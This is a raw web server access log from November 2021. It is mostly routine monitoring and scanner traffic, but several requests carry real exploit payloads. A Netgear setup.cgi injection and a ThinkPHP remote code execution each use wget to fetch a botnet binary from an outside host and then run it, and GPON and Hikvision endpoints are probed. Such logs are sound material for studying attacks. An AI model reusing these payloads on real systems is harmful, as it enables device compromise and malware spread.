212.91.246.72 - - [06/Nov/2021:12:43:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.93.77 - - [06/Nov/2021:12:43:14 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.93.77 - - [06/Nov/2021:12:43:17 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.93.77 - - [06/Nov/2021:12:43:22 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.93.77 - - [06/Nov/2021:12:43:25 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.93.77 - - [06/Nov/2021:12:43:32 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.93.77 - - [06/Nov/2021:12:43:33 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [06/Nov/2021:12:44:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.127.159.198 - - [06/Nov/2021:12:44:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:12:45:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:46:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:47:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.93.77 - - [06/Nov/2021:12:47:56 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.93.77 - - [06/Nov/2021:12:48:01 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [06/Nov/2021:12:48:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.93.77 - - [06/Nov/2021:12:48:06 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.93.77 - - [06/Nov/2021:12:48:10 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [06/Nov/2021:12:49:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:50:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:51:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:52:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:53:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:54:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:55:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:56:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:57:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:58:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:12:59:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:00:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:01:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.250.140.169 - - [06/Nov/2021:13:01:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [06/Nov/2021:13:02:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:03:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:04:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.3.19.243 - - [06/Nov/2021:13:04:15 +0100] "\x03" 501 316 "-" "-"
193.3.19.243 - - [06/Nov/2021:13:04:21 +0100] "\x03" 501 316 "-" "-"
193.3.19.243 - - [06/Nov/2021:13:04:23 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:05:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:06:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:07:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:08:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:09:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:10:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:11:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:12:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:13:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.182 - - [06/Nov/2021:13:13:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:14:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:15:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.171 - - [06/Nov/2021:13:15:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:13:16:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.67 - - [06/Nov/2021:13:16:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:17:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:18:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:19:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.68 - - [06/Nov/2021:13:19:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:20:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:21:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:22:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.66 - - [06/Nov/2021:13:22:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:23:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:24:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.92 - - [06/Nov/2021:13:24:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:25:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:26:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:27:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:28:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.195 - - [06/Nov/2021:13:28:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:29:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:30:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:31:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.110 - - [06/Nov/2021:13:31:53 +0100] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Go-http-client/1.1"
185.53.90.110 - - [06/Nov/2021:13:31:53 +0100] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Go-http-client/1.1"
212.91.246.72 - - [06/Nov/2021:13:32:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:33:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:34:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:35:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:36:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:37:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:38:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:39:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
182.113.199.249 - - [06/Nov/2021:13:39:13 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [06/Nov/2021:13:40:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:41:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.159.90.87 - - [06/Nov/2021:13:41:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3024.59 Safari/537.32"
212.91.246.72 - - [06/Nov/2021:13:42:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
182.120.230.44 - - [06/Nov/2021:13:42:44 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.120.230.44:42189/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:43:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:44:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.66 - - [06/Nov/2021:13:44:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:45:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:46:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:47:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:48:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:49:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.20.226.243 - - [06/Nov/2021:13:49:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:13:50:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:51:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:52:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:53:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.182 - - [06/Nov/2021:13:53:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:54:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.163 - - [06/Nov/2021:13:54:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:13:55:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:13:56:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.115.124.99 - - [06/Nov/2021:13:56:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.37 - - [06/Nov/2021:13:56:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.36 - - [06/Nov/2021:13:56:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.9 - - [06/Nov/2021:13:57:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
27.115.124.106 - - [06/Nov/2021:13:57:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:13:57:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.115.124.43 - - [06/Nov/2021:13:57:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.9 - - [06/Nov/2021:13:57:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.106 - - [06/Nov/2021:13:57:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
27.115.124.36 - - [06/Nov/2021:13:57:19 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.74 - - [06/Nov/2021:13:57:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
27.115.124.9 - - [06/Nov/2021:13:57:25 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.108 - - [06/Nov/2021:13:57:25 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
27.115.124.43 - - [06/Nov/2021:13:57:26 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.100 - - [06/Nov/2021:13:57:38 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.74 - - [06/Nov/2021:13:57:39 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
27.115.124.9 - - [06/Nov/2021:13:57:40 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [06/Nov/2021:13:58:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.115.124.75 - - [06/Nov/2021:13:58:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.108 - - [06/Nov/2021:13:58:06 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.9 - - [06/Nov/2021:13:58:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
27.115.124.10 - - [06/Nov/2021:13:58:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
27.115.124.43 - - [06/Nov/2021:13:58:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.106 - - [06/Nov/2021:13:58:33 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
27.115.124.9 - - [06/Nov/2021:13:58:34 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.74 - - [06/Nov/2021:13:58:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
119.224.91.233 - - [06/Nov/2021:13:58:40 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.14.226.120/notabotnet/notabotnet.x86 -O /tmp/.notabotnet; chmod 777 /tmp/.notabotnet; /tmp/.notabotnet ThinkphpRep' HTTP/1.1" 404 310 "-" "Tsunami/2.0"
212.91.246.72 - - [06/Nov/2021:13:59:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.115.124.108 - - [06/Nov/2021:13:59:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.75 - - [06/Nov/2021:13:59:10 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.106 - - [06/Nov/2021:13:59:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
27.115.124.44 - - [06/Nov/2021:13:59:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.108 - - [06/Nov/2021:13:59:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.36 - - [06/Nov/2021:13:59:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
27.115.124.99 - - [06/Nov/2021:13:59:42 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
27.115.124.37 - - [06/Nov/2021:13:59:42 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.99 - - [06/Nov/2021:13:59:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:14:00:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.115.124.36 - - [06/Nov/2021:14:00:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
27.115.124.43 - - [06/Nov/2021:14:00:10 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
27.115.124.9 - - [06/Nov/2021:14:00:10 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [06/Nov/2021:14:01:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.2 - - [06/Nov/2021:14:01:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
27.115.124.74 - - [06/Nov/2021:14:01:41 +0100] "POST /10/115035-Idhaye-Enhos-Yube HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
212.91.246.72 - - [06/Nov/2021:14:02:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:14:03:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.66 - - [06/Nov/2021:14:03:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Nov/2021:14:04:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.162 - - [06/Nov/2021:14:04:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:14:05:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:14:06:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:14:07:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:14:08:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:14:09:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:14:10:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.58.210.165 - - [06/Nov/2021:14:10:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:17 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:17 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /im/ HTTP/1.1" 404 308 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /h5/ HTTP/1.1" 404 308 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /h5/ HTTP/1.1" 404 308 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /otc/ HTTP/1.1" 404 309 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /xy/ HTTP/1.1" 404 308 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /homes/ HTTP/1.1" 404 311 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /im/h5/ HTTP/1.1" 404 311 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:18 +0100] "GET /api/apps HTTP/1.1" 404 313 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:19 +0100] "GET /site.js HTTP/1.1" 404 312 "-" "okhttp/3.3.1"
